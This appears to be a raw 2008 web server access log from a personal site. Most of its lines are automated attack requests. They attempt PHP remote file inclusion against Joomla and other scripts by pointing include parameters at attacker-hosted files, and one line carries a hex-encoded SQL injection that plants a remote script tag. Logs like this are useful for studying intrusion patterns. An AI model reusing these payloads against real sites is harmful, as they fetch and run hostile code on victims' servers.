74.54.42.146 - - [31/Aug/2008:09:36:10 -0700] "GET /logs/access_080718.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:11 -0700] "GET /logs/access_080718.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.42.146 - - [31/Aug/2008:09:36:12 -0700] "GET /logs/access_080718.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:36:14 -0700] "GET /logs/access_080615.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [31/Aug/2008:09:36:26 -0700] "GET /logs/access_080224.log/index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:36:27 -0700] "GET /logs/access_080820.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:36:29 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89902 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:36:29 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:36:38 -0700] "GET /logs/access_080528.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:36:52 -0700] "GET /logs/access_080615.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:36:54 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:36:56 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 200 89846 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:36:57 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.66.208.57 - - [31/Aug/2008:09:36:59 -0700] "GET //plugins/payment/secpay/xsecpay.inc.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:37:21 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:37:21 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:37:22 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:37:30 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:37:30 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:37:30 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.175.88.84 - - [31/Aug/2008:09:37:30 -0700] "GET /logs/access_080604.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/ids.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:37:32 -0700] "GET /logs/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 63000 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:37:35 -0700] "GET /?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 89527 "-" "libwww-perl/5.79" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:37:52 -0700] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:37:52 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:37:52 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:37:54 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 200 89862 "-" "libwww-perl/5.812" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:37:54 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
41.219.254.61 - - [31/Aug/2008:09:38:02 -0700] "GET /logs/access_080113.log HTTP/1.1" 200 324995 "http://search.yahoo.com/search?p=%22index+of%22+r57.php&ei=UTF-8&fr=yfp-t-501&xargs=0&pstart=1&b=41&xa=.Y7kZBlLsziXViljPhak3Q--,1220286965" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:09:38:10 -0700] "GET /logs/access_080302.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:38:12 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:09:38:12 -0700] "GET /index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 89727 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:09:38:12 -0700] "GET /logs/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:38:13 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 200 89862 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:38:15 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:38:16 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:38:25 -0700] "GET /logs/?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 63000 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:38:26 -0700] "GET /logs/access_080820.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:38:26 -0700] "GET /?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 89511 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:38:28 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89902 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:38:28 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:38:39 -0700] "GET /logs/access_080528.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:38:45 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:38:46 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 200 89862 "-" "libwww-perl/5.812" "www.dmulk.com"
41.219.254.61 - - [31/Aug/2008:09:38:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
41.219.254.61 - - [31/Aug/2008:09:38:53 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
212.34.136.212 - - [31/Aug/2008:09:38:57 -0700] "GET /logs/access_080528.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:09:39:02 -0700] "GET /logs/access_080721.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
198.66.208.57 - - [31/Aug/2008:09:39:03 -0700] "GET /logs/access_080722.log//plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.57 - - [31/Aug/2008:09:39:03 -0700] "GET //plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.57 - - [31/Aug/2008:09:39:03 -0700] "GET /logs//plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://coveringspr.com/components/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:39:25 -0700] "GET /logs/access_080629.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:39:26 -0700] "GET /logs/access_080606.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:39:30 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:09:39:43 -0700] "GET /logs/access_080718.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:40:04 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:40:32 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:40:34 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 200 89927 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:40:35 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar//tools/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:09:41:06 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:41:24 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:41:24 -0700] "GET /logs/access_080629.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:41:26 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:41:31 -0700] "GET /logs/access_080606.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:09:41:33 -0700] "GET /logs/access_080727.log//components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:09:41:33 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:09:41:34 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:09:41:39 -0700] "GET /logs/access_080727.log//components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:09:41:39 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:09:41:39 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:09:41:43 -0700] "GET /?sourcedir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 200 89527 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:09:41:46 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:41:50 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:09:41:53 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.56.11 - - [31/Aug/2008:09:41:55 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
63.208.74.34 - - [31/Aug/2008:09:41:56 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:09:41:56 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:09:41:59 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:09:42:06 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.97.35 - - [31/Aug/2008:09:42:08 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:09:42:20 -0700] "GET /logs/access_080529.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:09:42:20 -0700] "GET /logs/access_080615.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:42:23 -0700] "GET /logs/access_080110.log//werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:42:23 -0700] "GET //werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [31/Aug/2008:09:42:24 -0700] "GET /logs//werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:42:26 -0700] "GET /logs/access_080110.log//werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:42:26 -0700] "GET //werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:42:26 -0700] "GET /logs//werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:09:42:35 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?M=A HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:42:46 -0700] "GET /logs/access_080820.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:42:48 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89886 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:42:50 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:43:03 -0700] "GET /logs/access_080528.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:43:17 -0700] "GET /logs/access_080110.log//werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:43:17 -0700] "GET //werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.26.101 - - [31/Aug/2008:09:43:18 -0700] "GET /logs//werbungFrame.php?do=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.70.32.7 - - [31/Aug/2008:09:43:27 -0700] "GET /logs/access_080712.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.160.195.98 - - [31/Aug/2008:09:43:40 -0700] "GET /logs/access_080514.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272Bdmulk/us1:4.160.195.98 -61.47.10.168 - - [31/Aug/2008:09:43:43 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:09:43:46 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:09:44:30 -0700] "GET /logs/access_080218.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:44:36 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:44:36 -0700] "GET /logs//index.php?abg_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:44:37 -0700] "GET //index.php?abg_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 89522 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
121.180.11.132 - - [31/Aug/2008:09:45:06 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
